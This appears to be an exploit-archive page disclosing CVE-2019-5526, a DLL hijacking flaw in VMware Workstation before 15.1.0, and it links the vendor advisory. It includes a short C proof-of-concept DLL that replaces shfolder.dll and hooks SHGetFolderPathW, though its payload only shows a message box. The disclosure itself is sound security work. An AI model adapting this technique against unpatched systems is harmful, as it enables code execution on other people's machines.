VMware Workstation versions prior to 15.1.0 suffer from a dll hijacking vulnerability.
MD5 | e4ae43fff5271c25af6a88e2b9cdeb55
Download
MD5 | e4ae43fff5271c25af6a88e2b9cdeb55
Download
https://www.vmware.com/security/advisories/VMSA-2019-0007.htmlCode:
#---------------------------------------------------------
# Title: VMware Workstation DLL hijacking < 15.1.0
# Date: 2019-05-14
# Author: Miguel Mendez Z. & Claudio Cortes C.
# Team: www.exploiting.cl
# Vendor: https://www.vmware.com
# Version: VMware Workstation Pro / Player (Workstation)
# Tested on: Windows Windows 7_x86/7_x64 [eng]
# Cve: CVE-2019-5526
#---------------------------------------------------------
Description:
VMware Workstation contains a DLL hijacking issue because some DLL.
DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()
------Code_Poc-------
#include "dll.h"
#include <windows.h>
DLLIMPORT void SHGetFolderPathW()
{
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
exit(0);
}
--------------------------